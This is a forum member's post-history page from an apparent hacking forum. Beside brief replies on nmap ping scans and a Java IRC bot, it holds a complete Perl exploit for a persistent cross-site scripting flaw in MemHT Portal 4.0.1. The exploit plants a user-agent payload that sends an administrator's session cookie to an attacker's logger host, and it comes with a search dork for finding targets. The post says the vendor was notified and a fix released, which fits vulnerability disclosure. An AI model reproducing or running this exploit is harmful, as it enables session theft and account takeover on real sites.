Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.

Messages - ZonTa

Pages: [1]

Tutorials / Re: [Tutorial] Portscanning Fun

« on: December 24, 2011, 03:25:00 PM »

Quote from: Kulverstukas on December 24, 2011, 02:27:42 PM

You can write all the IP's to the list and then do

Code: [Select]
kulverstukas@kulverstukas-desktop:~$ nmap -sP -iL ~/ips.list Starting Nmap 5.00 ( http://nmap.org ) at 2011-12-24 15:26 EET Host bru01m01-in-f105.1e100.net (209.85.147.105) is up (0.067s latency). Host ir1.fp.vip.mud.yahoo.com (209.191.122.70) is up (0.17s latency). Host xvm-100-57.ghst.net (173.246.100.57) is up (0.14s latency). Nmap done: 3 IP addresses (3 hosts up) scanned in 2.80 seconds
-sP states that it should do nothing else but ping the host.
-iL states that it will scan all IP's in the given list, ips.list file in my case.

Most new routers and cameras doesn't respond to icmp.

Tutorials / Re: HTTP Splitting

« on: April 14, 2011, 03:45:40 AM »

So when we do the Cache Poisoning , it works for all clients ??

Tutorials / Re: Linux (Web)server security

« on: April 14, 2011, 03:30:40 AM »

It wasn't finished when u posted in opensc a long time ago :\

Hacking and Security / MemHT Portal 4.0.1 Persistent Cross Site Scripting Vulnerability [user agent]

« on: November 27, 2010, 04:57:09 PM »

I wrote this. I reported vendor and he gave me a positive reply. hehe

http://www.exploit-db.com/exploits/15623/

Code: [Select]

#!/usr/bin/perl 
# MemHT Portal 4.0.1 Persistent Cross Site Scripting Vulnerability [user agent]
# by ZonTa - zontahackers[at]gmail[dot]com
#
# After successful inject wait for the admin to view statistic page.
# Fix is available : http://www.memht.com/news_149_MemHT-Portal-4-0-2.html
# Dork : intext:"MemHT Portal is a free software released under the GNU/GPL License by Miltenovik Manojlo"

use Getopt::Std;
use Digest::MD5('md5_hex');
use LWP::UserAgent;

my ($host,$id,$username,$password,$logger) = @ARGV;
 
my $http = new LWP::UserAgent;
my $u_agent = "]\"</td></tr><BODY ONLOAD=document.location=\"http://$logger?cookie=\"+document.cookie+\"&redirect=http://$host\">";
my $cookies = "login_user=$id#".md5_hex($username)."#".md5_hex($password);

Main::Exploit();

package Main;

sub Exploit 
{    
    if (@ARGV != 5) {
        Main::Usage();
    }
    else { 
        HTTP::UserAgent($u_agent);
        MemHT::Login();     
    }    
}    

sub Usage {
 
return print <<EOF;
+-------------------------------------------------------------------+
| MemHT Portal 4.0.1 Persistent Cross Site Scripting Vulnerability  |
+-------------------------[user agent]------------------------------+

by ZonTa - zontahackers[at]gmail[dot]com
 
Usage: perl exploit.pl host/path userId user pass logger[OPTIONS]

host: target host and memht path
userId: user id
user: valid username
pass: valid password
logger: PHP loging file
  
Example: 
perl exploit.pl localhost/memht 2 foo secret 192.168.1.5/logger.php 

Download Logger.php -> http://pastebin.com/K6E9AWrC

EOF
}

package MemHT;		
        
sub Login
{
    HTTP::Cookies($cookies);
    my $response = HTTP::GET($host.'/index.php?page=pvtmsg&op=newMessage');
     
    if ($response->content =~ /access denied/i) {
        print "Login Failed!\n";
		exit;
	}
	else {
		print "Logged In!\n";
		print "XSS injected !";
        
    }	
}

package HTTP;

sub UserAgent 
{
    return $http->agent($_[0]);
} 

sub Cookies 
{
    return $http->default_header('Cookie' => $_[0]);
}
 
sub GET 
{    
    if ($_[0] !~ m{^http://(.+?)$}i) {
        return $http->get('http://'.$_[0]);
    }    
    else {
        return $http->get($_[0]);
    }    
}
     
sub POST 
{   
    if ($_[0] !~ m{^http://(.+?)$}i) {
        return $http->post('http://'.$_[0]);
    }    
    else {
        return $http->post($_[0]);
    }    
}
     
sub http_header 
{
    return $http->default_header($_[0]);
}  

# Greetz to Sri Lankans

Hardware / Re: Make your old flash drive bootable!

« on: November 27, 2010, 05:23:20 AM »

Do you have a solution for a computer that doesn't have USB boot ? That computer have 2 USB ports but it doesn't have USB boot option.

Scripting Languages / Java IRC Bot

« on: November 25, 2010, 06:51:24 PM »

I was going to make an AI bot , and ended up with this. lol

Code: [Select]

/**
 *
 * @author ZonTa
 */
import java.io.*;
import java.util.*;
import java.net.Socket;


public class JBot implements Runnable {

   Random generator = new Random();
   int r = generator.nextInt(100);

   private String server;
   private int port;
   private String channel;
   private String nick, user, name, owner;

   protected void server(String server) {
      this.server = server;
   }

   protected String server() {
      return this.server;
   }

   
   protected void port(int port) {
      this.port = port;
   }

   protected void channel(String channel) {
      this.channel = channel;
   }

   protected String channel() {
      return this.channel;
   }

   protected int port() {
      return this.port;
   }

   protected void nick(String nick) {
      this.nick = nick;
   }

   protected String nick() {
      return this.nick;
   }

   protected void user(String user) {
      this.user = user;
   }

   protected String user() {
      return this.user;
   }

   protected void name(String name) {
      this.name = name;
   }

   protected String name() {
      return this.name;
   }

   protected void owner(String owner) {
      this.owner = owner;
   }

   protected String owner() {
      return this.owner;
   }

   private boolean isActive;

   protected void isActive(boolean bool) {
      this.isActive = bool;
   }

   protected boolean isActive() {
      return this.isActive;
   }

   public static void main(String args[]) {
      System.out.println("Starting program.");
      try {
         new JBot().start();
      } catch (java.io.IOException e) {
      }
   }

      /**
		* Credits to whoever wrote it.
		* The AI KnowledgeBase for the bot */
      static String[][] KnowledgeBase = {
        {"HELLO",
		 "Hello!."
		},

        {"WHAT IS YOUR NAME",
		 "MY\tNAME\tIS\tJ-BOT."
		},

		{"HI",
		 "HI\tTHERE!",
		},

		{"HOW ARE YOU",
		 "I'M\tDOING\tFINE!"
		},

		{"WHO ARE YOU",
		 "I'M\tAN\tA.I\tPROGRAM."
		},

		{"ARE YOU INTELLIGENT",
		 "YES,OFCORSE."
		},

		{"ARE YOU REAL",
		 "DOES\tTHAT\tQUESTION\tREALLY\tMATERS\tTO\tYOU?"
		}
    };

    static String findMatch(String str) {
		String result = "";
		for(int i = 0; i < KnowledgeBase.length; ++i) {
			if(KnowledgeBase[i][0].equalsIgnoreCase(str)) {
				result = KnowledgeBase[i][1];
				break;
			}
		}
		return result;
    }

   protected void sayIt(String str) throws IOException {
       out.write(str);
       out.flush();
   }

   static String getMsg(String str) {
       String[] items = str.split(":");
       // System.out.println(items.length);
       if(items.length > 2)
           return items[2];
       else
           return "";
   }

    protected String getUser(String user) {
       String[] items = user.split("!");
       return items[0].replace(":", "");
    }

   protected JBot() {
      System.out.println("Initializing.");
      this.server("irc.evilzone.org");
      this.port(6667);
      this.nick("jBOT-" + r);
      this.user("jBOT");
      this.name("jBOT");
      this.channel("#evilzone");
      this.owner("Owner");
   }

   private Socket socket;
   private BufferedReader in;
   private BufferedWriter out;

   protected void start() throws java.io.IOException {
      this.socket = new Socket(this.server(), this.port());
      this.in = new BufferedReader(new InputStreamReader(socket.getInputStream()));
      this.out = new BufferedWriter(new OutputStreamWriter(socket.getOutputStream()));
      if (socket.isConnected()) {
         out.write("NICK " + this.nick() + "\r\n");
         out.write("USER " + this.user() + " \"\" \"\" :" + this.name() + "\r\n");

         this.isActive(true);
         System.out.println("Starting thread.");
         new Thread(this).start();
		 out.write("JOIN " + this.channel() +  " 456\r\n");
		 out.flush();
      }
   }

    public void run() {
      String buffer;
        try {
            out.write("PRIVMSG " + this.channel() + " Greetingz!\r\n");
            out.flush();
        } catch (IOException ex) {

        }

      while (this.isActive()) {
         try {
            while ((buffer = in.readLine()) != null) {
                System.out.println(buffer);
                String sResponse = findMatch(getMsg(buffer));
                if(sResponse.length() != 0) {
                    sayIt("PRIVMSG " + this.channel() + " " + sResponse +"\r\n");
                }
                
               if (buffer.startsWith("PING")) {
                  sayIt("PONG " + buffer.substring(5) + "\r\n");
                }
               if (buffer.contains("GiveOP")) {
                   String usr[] = buffer.split(" ");
                   if(usr.length >=4 ) {
                      try {
                          sayIt("MODE " + this.channel() + " +o "+ usr[4] + "\r\n");
                      } catch (Exception e) {
                          System.out.println(e.getMessage());
                      }
                  }else {
                       sayIt("MODE " + this.channel() + " +o "+ this.owner() + "\r\n");
                  }
                  
                }

               if (buffer.contains("kiss") ) {
                  sayIt("PRIVMSG " + this.channel() + " :* :* :* \r\n");
               }

                if (buffer.contains("thank") || buffer.contains("Thank") ) {
                  sayIt("PRIVMSG " + this.channel() + " You\tare\twelcome\t" + getUser(buffer) + "!\r\n");
               }

                 if (buffer.contains("KICK " + this.channel() + " " + this.nick())) {
                  sayIt("JOIN " + this.channel() +  " 456 \r\n");
                  sayIt("PRIVMSG " + this.channel() + " \u0002You\tcan't\tkick\tme! \r\n");
               }

               if (buffer.contains("JOIN :" + this.channel()) && !buffer.contains(this.nick)) {
                  sayIt("PRIVMSG " + this.channel() + " Welcome\t" + getUser(buffer) + " \r\n");
               }
  
            }
	  
		} catch (java.io.IOException e) {
             System.out.println(e.getStackTrace());
        }
      }
   }
}

Pages: [1]